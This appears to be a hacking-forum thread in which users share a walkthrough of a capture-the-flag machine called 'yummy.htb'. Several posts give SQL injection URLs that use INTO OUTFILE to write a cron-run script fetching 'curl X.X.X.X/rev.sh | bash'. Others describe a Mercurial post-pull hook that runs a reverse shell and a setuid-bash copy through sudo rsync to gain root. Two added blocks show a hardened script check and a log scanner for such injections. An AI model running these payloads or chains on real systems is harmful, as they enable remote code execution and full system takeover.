Posts: 18
Threads: 0
Joined: Aug 2024
(Oct 06, 2024, 05:49 AM)mrdot457 Wrote: How did you guys find the admindashboard, and where did you get the script to get the admin JWT token? Can you please explain it to me?
The script is modified from the source code in backupapp.zip.
crontab -> scripts -> backupapp.zip -> signature.py script that is not normal -> custom flaw with public/private key -> create your own public/private key pair script.
Optional task: do a math degree.
Posts: 124
Threads: 1
Joined: Apr 2024
Oct 06, 2024, 07:42 AM
(This post was last modified: Oct 06, 2024, 07:42 AM by jsvensson.)
For those who wonder how the foothold works:
It results from /data/scripts/dbmonitor.sh.
Among other things, this script checks if the dbstatus.json file exists.
If it exists and does not contain “database is down”, it executes /bin/bash "$latest_version", where latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
So it will execute /bin/bash /data/scripts/fixer-v____ if you write such a file there and write anything other than “database is down” to /data/scripts/dbstatus.json.
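As an added example, not the box's dbmonitor.sh and not from any post in this thread: the "newest fixer-v* wins" selection step described above, beside a hardened selector that refuses any script an unprivileged user could have written. It assumes GNU coreutils (stat -c, sort -V) and uses /data/scripts only as a placeholder default.

```shell
# Added example, not the real /data/scripts/dbmonitor.sh. SCRIPTS_DIR is a
# placeholder default taken from the thread; GNU stat/sort are assumed.
SCRIPTS_DIR="${SCRIPTS_DIR:-/data/scripts}"

# Weak: the monitor's own logic as the thread describes it. Whatever sorts
# last by version gets handed to /bin/bash, with no check on who wrote it.
weak_latest_fixer() {
    ls -1 "$1"/fixer-v* 2>/dev/null | sort -V | tail -n 1
}

# Hardened: same "newest wins" rule, but the directory and the script must be
# owned by the uid running the monitor (root in production), must be regular
# files (no symlinks) and must not be writable by group or others.
# Prints the path and returns 0, otherwise prints nothing and returns 1.
safe_latest_fixer() {
    dir=$1
    cand=$(ls -1 "$dir"/fixer-v* 2>/dev/null | sort -V | tail -n 1)
    [ -n "$cand" ] && [ -f "$cand" ] && [ ! -L "$cand" ] || return 1
    me=$(id -u)
    for p in "$dir" "$cand"; do
        info=$(stat -c '%u %a' "$p") || return 1
        uid=${info% *}
        perm=${info#* }
        [ "$uid" = "$me" ] || return 1
        # leading 0 makes the shell read the mode as octal; 022 = g+w | o+w
        [ $(( 0$perm & 022 )) -eq 0 ] || return 1
    done
    printf '%s\n' "$cand"
}

# Drop-in for the monitor's "execute the fixer" line: run only a vetted script.
run_fixer_if_safe() {
    fixer=$(safe_latest_fixer "${1:-$SCRIPTS_DIR}") || {
        echo "refusing to run an untrusted fixer script" >&2
        return 1
    }
    /bin/bash "$fixer"
}
```

The ownership and write-bit checks are what make the planted-file trick described above fail: a file dropped by the database user into a directory it can write to is rejected before bash ever sees it.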
Posts: 41
Threads: 2
Joined: Sep 2023
(Oct 06, 2024, 07:42 AM)jsvensson Wrote: For those who wonder how the foothold works:
It results from /data/scripts/dbmonitor.sh.
Among other things, this script checks if the dbstatus.json file exists.
If it exists and does not contain “database is down”, it executes /bin/bash "$latest_version", where latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
So it will execute /bin/bash /data/scripts/fixer-v____ if you write such a file there and write anything other than “database is down” to /data/scripts/dbstatus.json.
That's why you have to replace dbstatus.json first to get the foothold to work.
Posts: 39
Threads: 12
Joined: Aug 2024
(Oct 06, 2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line of /tmp/.hg/hgrc:
[hooks]
post-pull = /tmp/revshell.sh
Execute:
chmod +x /tmp/revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access.
I'm assuming there is a cleanup script running on the machine, because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy, but I still had issues getting it to execute even with your steps.
I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having similar issues.
Posts: 14
Threads: 2
Joined: Aug 2024
(Oct 06, 2024, 12:32 PM)ir0nman4l1f3 Wrote: (Oct 06, 2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line of /tmp/.hg/hgrc:
[hooks]
post-pull = /tmp/revshell.sh
Execute:
chmod +x /tmp/revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access.
I'm assuming there is a cleanup script running on the machine, because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy, but I still had issues getting it to execute even with your steps.
I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having similar issues.
I was stuck with the errors from DEV to ROOT; using your method, it worked on the first try.
cd /home/dev/ && cp /bin/bash app-production/bash && chmod u+s app-production/bash && sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/ && /opt/app/bash -p
Posts: 39
Threads: 12
Joined: Aug 2024
(Oct 06, 2024, 12:39 PM)dogedofedoge Wrote: (Oct 06, 2024, 12:32 PM)ir0nman4l1f3 Wrote: (Oct 06, 2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line of /tmp/.hg/hgrc:
[hooks]
post-pull = /tmp/revshell.sh
Execute:
chmod +x /tmp/revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access.
I'm assuming there is a cleanup script running on the machine, because I kept getting an error earlier while trying this method and eventually gave up. Reading your process made me feel less crazy, but I still had issues getting it to execute even with your steps.
I eventually resolved this by chaining everything together with "&&" between each command. Leaving this comment in case anyone else is having similar issues.
I was stuck with the errors from DEV to ROOT; using your method, it worked on the first try.
cd /home/dev/ && cp /bin/bash app-production/bash && chmod u+s app-production/bash && sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/ && /opt/app/bash -p
Nice! All the praise goes to @hackemall though, since they helped steer me in the right direction after all.
Posts: 11
Threads: 0
Joined: Jun 2024
(Oct 06, 2024, 05:04 AM)mbaker5159 Wrote: I would like to learn more about this set of commands. Any reference link?
Oops... these commands:
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
Posts: 52
Threads: 2
Joined: Apr 2024
Oct 06, 2024, 05:34 PM
(This post was last modified: Oct 06, 2024, 05:35 PM by Rob1nhood.)
(Oct 06, 2024, 03:35 PM)mbaker5159 Wrote: (Oct 06, 2024, 05:04 AM)mbaker5159 Wrote: I would like to learn more about this set of commands. Any reference link?
Oops... these commands:
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
Using SQLi, we can see that the o field is vulnerable.
This is where we craft our injection.
After enumerating the DB, we can see we have the FILE permission, meaning we can read/write files.
Knowing how dbmonitor works, we then craft the SQL injection to write "PING" into the file dbstatus.json.
Since it's not "database is down", this triggers the line in dbmonitor that runs fixer-v*, which is all fixer-v files.
The second injection then writes our curl command, which grabs and executes our reverse shell, as a fixer-v script.
So long as you do them in succession via automation, or something like Repeater in Burp Suite, so they run one after another, it will trigger the fixer-v____ file you created, and dbmonitor.sh will run it.
So when done correctly, it curls you, grabs the reverse shell file you're hosting, and executes it as the SQL user.
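An added detection example, not part of Rob1nhood's post or the box: a POSIX sh/awk scanner that percent-decodes the request field of web-server access-log lines and flags a MySQL INTO OUTFILE / INTO DUMPFILE write, which is the primitive the chain above depends on. The log lines are constructed and only mirror the shape of the encoded requests quoted earlier in the thread.

```shell
# Added example, not from the thread. Needs only POSIX sh, awk and grep.

# Percent-decode one string: '+' -> space, %XX -> byte. POSIX awk lacks
# strtonum, so each hex digit is resolved with index() arithmetic.
urldecode() {
    printf '%s\n' "$1" | awk '
    function hx(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        s = $0; gsub(/\+/, " ", s); out = ""
        while ((i = index(s, "%")) > 0) {
            out = out substr(s, 1, i - 1)
            h = substr(s, i + 1, 2)
            if (h ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hx(substr(h, 1, 1)) * 16 + hx(substr(h, 2, 1)))
                s = substr(s, i + 3)
            } else { out = out "%"; s = substr(s, i + 1) }   # stray %, keep it
        }
        print out s
    }'
}

# Does a decoded request carry a SQL file write? Exit 0 = yes.
is_file_write() {
    printf '%s\n' "$1" | grep -qiE 'into[[:space:]]+(out|dump)file'
}

# Read access-log lines on stdin, print the decoded request of each hit,
# return 0 if at least one line matched.
scan_log() {
    hits=0
    while IFS= read -r line; do
        req=${line#*\"}          # drop everything up to the opening quote
        req=${req%% HTTP/*}      # keep "METHOD /path?query"
        dec=$(urldecode "$req")
        if is_file_write "$dec"; then
            hits=$((hits + 1)); printf 'ALERT: %s\n' "$dec"
        fi
    done
    [ "$hits" -gt 0 ]
}

# Constructed sample, not real traffic; the first line mirrors the thread's payload.
SAMPLE_LOG=$(cat <<'EOF'
10.0.0.5 - - [06/Oct/2024:05:00:01 +0000] "GET /admindashboard?s=aa&o=ASC%3b++select+%22ping%3b%22+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b HTTP/1.1" 200 512
10.0.0.9 - - [06/Oct/2024:05:00:02 +0000] "GET /admindashboard?s=aa&o=ASC HTTP/1.1" 200 512
EOF
)
```

Run it as `printf '%s\n' "$SAMPLE_LOG" | scan_log`; only the first line is reported, because the second is the benign sort request the injection was appended to. Disabling FILE for the application's database user, or setting secure_file_priv, removes the primitive itself; this scanner only tells you someone tried.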
Posts: 41
Threads: 4
Joined: Sep 2024
(Oct 06, 2024, 05:58 AM)Detector6 Wrote: (Oct 06, 2024, 05:49 AM)mrdot457 Wrote: How did you guys find the admindashboard, and where did you get the script to get the admin JWT token? Can you please explain it to me?
The script is modified from the source code in backupapp.zip.
crontab -> scripts -> backupapp.zip -> signature.py script that is not normal -> custom flaw with public/private key -> create your own public/private key pair script.
Optional task: do a math degree.
How do you get these files? I meant the backupapp.zip.
I tried LFI and other things, but I don't know how to get this.
Posts: 1
Threads: 0
Joined: Oct 2024
(Oct 05, 2024, 09:12 PM)R0B1NH00D_ORG Wrote: Was able to grab backupapp.zip after reading the app_backup script found in crontab.
How can I grab this file?